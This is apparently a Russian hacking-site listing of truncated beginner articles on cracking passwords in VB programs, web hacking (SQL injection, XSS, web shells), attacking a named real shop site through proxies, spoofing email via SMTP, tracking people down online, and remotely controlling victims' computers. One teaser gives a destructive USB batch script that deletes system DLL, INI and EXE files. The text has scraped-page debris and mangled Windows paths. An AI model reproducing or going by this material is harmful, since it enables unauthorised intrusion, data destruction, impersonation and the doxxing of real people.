Иногда при создании программ возникает необходимость несколько ограничить доступ к вашему продукту. В таких случаях обычно все используют стандартную форму в VB — Log In Dialog полагая, что это даёт стопроцентную защиту.
На самом деле это совсем не так! Меня давно интересовал вопрос о том возможно ли как-то подглядеть пароль из файла EXE и я понял, что действительно можно. Сегодня мы поговорим о том, как можно узнать пароль в программе EXE и о том, как защитить вашу программу от подобного рода взломов. Итак для начала создадим новый проект (Standart EXE) и кроме основной формы добавим в проект форму Log In Dialog (делается это с помощью диалогового окна Add Form, изображённого на предыдущей картинке). Читать далее
Небольшое примечание
Недавно мне в голову пришла идея переделать статьи владухи «Основы хакерства» и возможно написать продолжение.
Все дело в том, что информация в статьях немного устарела, поэтому я взялся подредактировать существующие статьи.
Некоторые темы будут полностью переписаны, некоторые будут оставлены. Ну что ж начнем.
Основы.
Привет, читатель. Год назад я пришёл на ХЗ, и очень хотел стать хакером. Никто не мог мне обьяснить многие простые вещи, я видел много опытных,
но стать на путь хакера мне помогли буквально единицы. И я могу их назвать: PinkPanther, DrWeb, R_a_ID_e_R.
Я обучался сам, не надеясь ни на чью помощь, стараясь описывать свои познания в статьях для новичков.
Так шло время, менялись поколения… Читать далее
Привет читатель. Я решил долго не тянуть и уже в этой статье рассказать о том, какими способами взламывают сайты, какие бывают уязвимости
и зачем собственно взламывать сайты. Что вы узнаете на сегодняшнем уроке:
Кто и зачем?
Какие бывают уязвимости.
Веб шелл, как и что.
Примечание: курсивом будут выделены слова, которые возможно будут вам не понятны. Найти их значение вы сможете в конце статьи.
Кто и зачем?
Вообще под понятием взлома я понимаю несанкционированный доступ к чему-либо.
Мы ломаем веб сайты. Поэтому нам нужно получить доступ к административной панели, либо украсть базу данных сайта, либо просто изменить главную страницу.
Все зависит от такого для чего производится взлом.
Рассмотрим основные мотивы:
Изменения главной странички ради удовольствия && мести. Читать далее
конецформыначалоформыЗдравствуйте уважаемые читатели. Мы продолжаем значиться азами веб хакинга. Это 3 урок и вот какие темы мы сегодня разберем:
Сплоиты – структура и использование
Google hacking
Более подробное изучение таких уязвимостей как:
-sql injection
-xss
-php include
Сплоиты.
Или эксплоиты. Это программы или скрипты которые автоматически реализуют какую либо уязвимость. Мы будем знакомиться с эксплоитами для веб приложений.
Кроме них существуют эксплоиты для прикладных программ. Они более сложные и тебе пока рановато их изучать.
Итак, возьмем инъекцию из прошлого урока
http://www.site.us/main. Читать далее
Всем привет!Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего! Сегодня я хочу новичкам рассказать как надо обращатся с сайтом! P.S Не судите строго это моя первая статья!
Так поехали!Жертва станет shop.iskusnitsa.ru!
Первым делом мы ставим сайтег на какой-нить сканер, и сами начинаем проверять РУКАМИ!!!Начнем с обследования сайта.
1:НАПЯЛИВАЕМ ПРОКСИ!!!Элиту есть такая прога как proxyswitcher! Вот ее советую, т.к. сам юзаю!Потом заходим на 2ip.ru;leader.ru;myip.ru и проверяемся если написано , что типо это не настоящий айпи а роутера и т.п. то меняем а если все норм приступаем!
2:Так походим по сылкам посмотрим где что и как переменые передаются!Сделали. Читать далее
конецформыначалоформыПривет всем, я, kazin8, расскажу о взломе одной компании. Сразу скажу 2 вещи. Во-первых, взлом был «локальным», то есть я на минуту имел доступ к ПК, а во-вторых, статья будет в стиле недавней «Полночный взлом», написанной —stranger—’ом) Если еще не передумали – читаем.
1. Мой дом. 10.00
Мда. Проработав все лето в долбаной компании я до сих пор не получил ни копейки.. Только эта мысль крутилась у меня в голове. Зарплату задерживали уже почти на месяц.. А скоро учеба, нужна одежда, учебники. И вот опять, я услышал их «Приходите завтра, примерно в час». Ну что же, час так час. Посидев за ПК и поговорив с редом, я начал собираться «В поход на Изенгард») Уже в который раз.
2. Контора компании «ХХХ» 13. Читать далее
конецформыначалоформыЧтобы послать на мыло письмо, где в строке «От» стоял желаемый нами адрес надо сделать следующие: зателнетится к SMTP-серверу (поддерживающему операцию, которую мы сейчас проведем) на 25 порт. Это можно сделать входящей в комплект к Windows программой telnet.exe. Чтобы зателнетится надо ввести в командной строке следующие (сейчас и далее звездочкой (*) будет обозначаться SMTP-сервер, которые вы решили использовать для отправки письма от чужого адреса):
telnet.exe smtp.*.ru.
В ответ этому коннекту вы должны получить, что то похожее на:
220 smtp.*.ru ESMTP Sendmail 8.9.3/8.9.3; Mon, 27 May 2002 17:38:54 +0400 (MSD).
Код 220 означает коннект к серверу прошел успешно. Теперь давайте возьмем за цель послать на адрес lamer@mail.ru письмо якобы от support@mail.ru . Читать далее
Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________
в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *. Читать далее
конецформыначалоформыПро социальную инженерию написано много интересных статей, про специфический google hacking мы тоже в курсе, но я хочу написать более простую версию поиска человека в сети.
Время как известно продукт весьма ценный и на развод жертвы мы тратим неопределённое в целом, но изначально большое количество времени, но ту информацию, которую мы выуживаем из жертвы, мы можем найти её гораздо
быстрее. Поиск занимает от 5 минут до 1 часа времени, в зависимости от того, что мы ищем. Сама статья расчитана исключительным образом на новичков. Наши любимые старички могут не читать, потому что они и так это всё знают.
И.Ф.О., ники и данные в примерах вымышленны.
Всё пишется в поучительно-ознакомительных целях.
Привожу 3 примера, небольшое пояснение после них последует. Читать далее
Здарова всем начинающим хакерам!С вами redbu11.Да да,именно НАЧИНАЮЩИМ хакерам,потомучто то о чём сейчас пойдёт речь,всем опытным взломщикам давно известно.В одной из моих прошлых статей (Статья называется «2 идеальных метода взлома»,тем кто её не читал,советую прочитать чтобы понимать лучше эту статью) я рассказывал о способах при помощи которых вы можете проникнуть в чужой компьютер и удалённо им управлять.Но я заметил по моим знакомым которые только начали заниматся хаком,и по многим новичкам в инете,что проникая в чужую систему имея возможность полнностью ею управлять,(Например при помощи радмина) то они просто начинают прикалыватся над челом,открывая ему блокнот на рабочем столе,и писать всякую дрянь,включать или выключать музыку,перезагружать компьютер и тд… Читать далее